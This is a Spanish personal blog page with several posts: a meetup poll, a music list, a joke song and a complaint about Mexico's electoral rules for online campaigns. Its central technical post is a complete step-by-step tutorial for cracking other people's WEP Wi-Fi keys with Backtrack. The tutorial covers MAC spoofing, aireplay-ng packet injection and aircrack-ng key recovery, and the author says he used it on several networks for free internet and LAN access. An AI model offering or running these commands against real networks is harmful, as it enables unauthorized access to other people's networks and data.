¿Destilando Web 4 Guanajuato? ¿¡¿DÓNDE?!?

Efectivamente, después de un periodo de sequía en los Destilando Web Guanajuato hemos vuelto a cortar el Agave para generar ese Tequila Valley que tanto caracteriza a Guanajuato... la pregunta ahora es...

¿¿Dónde podremos Destilar Web??

Pues es muy sencillo, cuando no se tiene la respuesta, pregúntale a los tequileros, así que les dejo la encuesta, si tienes Twitter, haz RT a este Tweet, y ¡¡voten, voten!!



NOTA: Para los que no saben qué es un Destilando Web o Tequila Valley, sigan los enlaces para mayor información.

Enjoy this Life!!

Rompiendo WEP con Intel 3945

Uno de mis primeros post (para ser exacto el séptimo) fue el mostrar cómo Romper claves WEP, y comenzaron a preguntarme si era necesaria otra tarjeta para poder hacer el procedimiento, a lo cual para mi desconocimiento amplio en esos momento sobre el tema era que si, era completamente necesaria otra tarjeta inalámbrica compatible con la distribución de Linux Backtrack para poder vulnerar la clave de seguridad WEP, que la mayoría de los usuarios promedio usan en sus routers, ya sea porque viene por default o no conocen otras opciones para proteger el acceso a sus redes inalámbricas.

En esta semana requería forzosamente segunda red con internet porque a la red que estaba conectado estaba MUY lenta, y me volvió a entrar la duda de cómo obtener la clave si no traía mi tarjeta inalámbrica externa, después de 2 horas de ardua lectura de la documentación del Backtrack y unos cuántos blogs, encontré la manera de aplicar un método INFALIBLE a pesar de poca señal inclusive, y lo mejor de todo... con la tarjeta que la mayoría de las portátiles trae... la Intel 3945abg.

Lo que necesitamos es:
  1. Distribución de Linux Backtrack.
  2. Un equipo con tarjeta Intel 3945 (que a partir de cierto paso es igual para casi todas las demás tarjetas sólo que sean capaces de inyectar paquetes)
Teniendo esto comenzamos booteando nuestro equipo con la distribución de Backtrack y elegimos la opción de gráficos KDE.

Romper WEP 00

UPDATE: Al momento de escribir código (no los números) pueden ir pulsando la tecla TAB (tabulador, la de las flechas en ambas direcciones) para que les complete los comandos y no suframos escribiendo estríctamente todo el código letra por letra y nos equivoquemos en el camino, sólo es necesario pulsar las letras iniciales y pulsar TAB para que complete el código.

Enseguida podremos verificar si tenemos una tarjeta Intel 3945abg con el siguiente comando:

lspci | grep Netowrk

Mostrándonos que efectivamente tenemos esa tarjeta

0c:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG Network Connection (rev02)

Lo que haremos es cambiar el modo de uso de la Intel 3945abg para poder monitorear e inyectar paquetes con estos comandos:

rmmod iwl3945
modprobe ipwraw

Romper WEP 01

A partir de este paso, las instrucciones son las mismas para la mayoría del resto de las tarjetas.

Una vez hecho esto escribimos este comando para ver cómo es que la distribución llama a nuestra tarjeta, que será la que NO nos marque "no wireless extensions", que en mi caso le llama wifi0:

iwconfig

Esta tarjeta la camuflajearemos cambiando su MAC, para ello la deshabilitaremos, cambiamos y volvemos a habilitar:

airmon-ng stop wifi down
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0

Ahora exploraremos todas las redes disponibles que alcance a detectar nuestra tarjeta con:

airodump-ng wifi0

Romper WEP 02

Ya exploradas todas las redes, pulsamos Control+C y elegimos la red a vulnerar, y copiamos su MAC o BSSID, ya que la necesitaremos en varias ocasiones más adelante, aparte de ello iniciamos con el proceso de inyección de paquetes para romper su seguridad con este código:

airodump-ng -c (canal de transmisión, columna CH) -w (nombre del archivo de captura) --bssid (MAC del router de red destino que copiamos) wifi0

Lo que para mi ejemplo quedó así:

airodump-ng -c 3 -w jafrancov --bssid 00:21:7C:D0:71:89 wifi0

Romper WEP 03

Abrimos una nueva ventana y nuestra siguiente instrucción hará una Autenticación/Asociación con el Router, si esta es correcta nos regresará una carita feliz como esta --> :-)

aireplay-ng -1 0 -a (MAC del router de la red destino que copiamos) -h 00:11:22:33:44:55 wifi0

Para mi ejemplo:

aireplay-ng -1 0 -a 00:21:7C:D0:71:89 -h 00:11:22:33:44:55 wifi0

Seguido y si es bien logrado colocamos el siguiente código para la inyección de paquetes, dado "enter" nos preguntará si deseamos usar el paquete que nos muestra, presionamos la tecla 'Y' y damos enter, para que inicie el proceso:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (MAC del router de red destino) -h 00:11:22:33:44:55 wifi0

Para mi ejemplo:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:21:7C:D0:71:89 -h 00:11:22:33:44:55 wifi0

Romper WEP 04

Hecho todo lo anterior sólo nos resta esperar un poco a que el valor de la columna "#Data" comience a aumentar, pasados los 10,000 datos intercambiados abrimos una nueva ventana de consola y escribimos:

aircrack-ng (Nombre que dieron al archivo de captura)-01.cap

Nueva y por última vez para mi ejemplo:

aircrack-ng jafrancov-01.cap

Automáticamente nos llevará a una pantalla donde prueba todas las posibles claves, si los datos de los paquetes inyectados no arrojaran una clave válida, nos indicará que intentemos pasados cada 5,000 IVs, que es lo mismo que el número de la columna '#Data', pasados los 160,000 es 100% probable que obtengamos una clave WEP común de 64 bits hexadecimal, en lo personal he visto una tendencia de usuarios a usar sólo números, así que a partir de los 10,000 IVs es bueno comenzar a probar, cuando sea descubierta la clave nos lanzará un texto que dice "KEY FOUND! [Clave]", ese número es la clave WEP que nos pide el router al intentar conectarnos.

Romper WEP 06

Este método lo usé ya con varias redes incluyendo de las de menor señal y aún así se pudo obtener la clave y libre acceso a internet y la red local del router como se puede ver en la imagen:

Romper WEP 08

No me queda más que recomendar cambiar de protocolo de seguridad a WPA por ejemplo, que hasta el momento es de los más seguros para redes inalámbricas, disfruten el post y puede ser una buena opción cuando se requiere de urgencia tener internet... je

Enjoy this Life!!

Música electrónica para Julio '09

Hacía un rato que no me ponía a hacer una buena selección de música electrónica, que en lo personal me encanta, y quería compartirla pero no de una manera simple como poner la lista y listo, busqué las canciones en Grooveshark y aprovechando sus Widgets, le damos una mejor presentación, estos son los que para mi son los mejores éxitos de música electrónica para el mes de Julio, tómese en cuenta que las posiciones en la música electrónica no varían mucho y el orden en que aparecen no son el orden de popularidad, sencillamente son mis gustos...


Espero se diviertan y les guste tanto como a mi me laten...

Enjoy this Life!!

Tócame el Windous (Canción del Verano 2009)

Indiscutiblemente la canción del verano... pongan mucha atención en el coro que dice "Yo soy el disco duro... del amor" y aprendanse la coreografía, risas para toooodo el fin de semana, algún día tendré que ponerla en mi radio xD



Enjoy this Life!!

IFE: ¿¿Regulación de Campañas Virtuales??

En estos días, siendo administrador de campaña virtual y medios digitales de un candidato para una elección popular, me puse a revisar los sitios de la tiendita de enfrente, y viendo las páginas de otros candidatos, muestran una imagen de entrada diciendo que por regulación es necesario y dan de baja su sitio a partir del 2 de Julio hasta nuevo aviso, que en teoría sería un día después de las elecciones o el día 8 que es cuando se publican los resultados definitivos.

Pero mi investigación no terminó allí, porque según la información que tengo y que está publicada, no hay algún régimen, comunicado, ley o estatuto que regule las campañas virtuales, aunque mi duda seguía rondando en la cabeza y me dispuse a hablar a IFEtel (01 800 433 2000), para lo cual les antecedo que México no está preparado para "regular" campañas virtuales y mucho menos para enfrentarlas, les explico por qué, mis preguntas eran lo bastantes sencillas como para que alguien con el mínimo de conocimiento de Web/Internet pudiera entender y contestar:
  1. ¿Es necesario quitar/desactivar/ocultar la página web del candidato?
  2. ¿Qué pasa con las redes sociales y servicios que se manejan (y que por algunos se pagó) como Facebook, Hi5 (estas 2 últimas son personales totalmente y no de campaña), Flickr, Youtube, Ustream, en algunos casos Twitter (otra completamente personal) y muchas otras más, también es necesario darlas de baja o qué hago con ellas?
Hice 3 llamadas la primera sólo hice la primer pregunta, y en las otras 2 llamadas, las 2 preguntas, cuando hice la primer llamada me dijeron "si, es necesario quitar la página del candidato", pero pues me surgió la segunda pregunta y volví a llamar para lo cual me dicen varias cosas debo aclarar que la segunda señorita si sabía de qué le estaba hablando, a lo que me respondieron esto:

- "La página debes quitarla... las redes sociales, déjeme investigar"
20 minutos después...
- "Si, también es necesario quitar las redes sociales"
- "Ok, ¿tendrás algún documento publicado, normativas o algo así donde pueda verificarlo? -pregunté -
- "Déjeme verificar, permítame un momento"
10 minutos más tarde
- "Disculpa la tardanza, pero estabamos equivocados, no existe algún documento que impida o regule internet, existe el reglamento de COFIPE, sin embargo no especifica nada enfocado a internet, entonces como gustes, puedes dejarlo o quitarlo"
- "Pero entonces, ¿puedo seguir teniendo campaña virtual conforme a lo que me dices o no?"
- "Si, ya que no hay reglamento que lo impida"
- "Muchas gracias..."

Cuál fue mi sorpresa que al llegar los licenciados encargados de verificar detalle a detalle el proceso electoral estaban en la misma situación de desconocimiento, uno decía que si y otro que no, para volver a aclarar dudas llamamos nuevamente, nos contesta otro telefonista y nos niega la posibilidad de dejar publicado cualquier cosa en internet ¡¡excepto YouTube!!.

Existe un desconocimiento total en el IFE sobre medios digitales, ya que en sus publicaciones de regulación de campañas, prohiben medios impresos y electrónicos, Internet es un medio DIGITAL, ¿¡¿cómo puede ser posible que te bloqueen una red social y te dejen abierto YouTube cuando por este último medio puede hacerse más propaganda?!?. Ahora qué pasa cuando las redes sociales como las antes mencionadas y muchas otras más son parte de la vida digital de la persona que en algún momento llegue a pasar por ser candidato, ¿¿tendrá que borrarlas??, es atentar contra la privacidad y libertad de expresión que como persona tiene, a mi ver y parecer lo único que debiera estar "censurado" en los días previos a las elecciones es la página oficial del candidato y solamente eso.

Invitaría a los señores diputados, senadores, quienes hagan las leyes y reglas del juego de las campañas políticas, al mismo IFE y cada uno de los órganos electorales estatales a que se unieran a una red social y conocieran de lo que están hablando o al menos conozcan qué es lo que van a intentar regular, internet es muy grande para hacerlo y si desconocen la cancha de juego jamás lo entenderán, regular internet será una lucha eterna por intentar entender y culpar sin saber.

Sólo nos resta esperar que las autoridades lo entiendan y exista mejores especialistas del área como asesores de quienes están al frente de las propuestas y cambios a las leyes, busquemos ese México que intenta entrar en el mundo digital, y seamos nosotros quienes lo respaldemos e impulsemos hacia un mejor presente y futuro.

UPDATE: Antes de que opinen lean este artículo sobre una aclaración de Regulación de Campañas: PSD niega incumplir acuerdo sobre campañas

Enjoy this life!!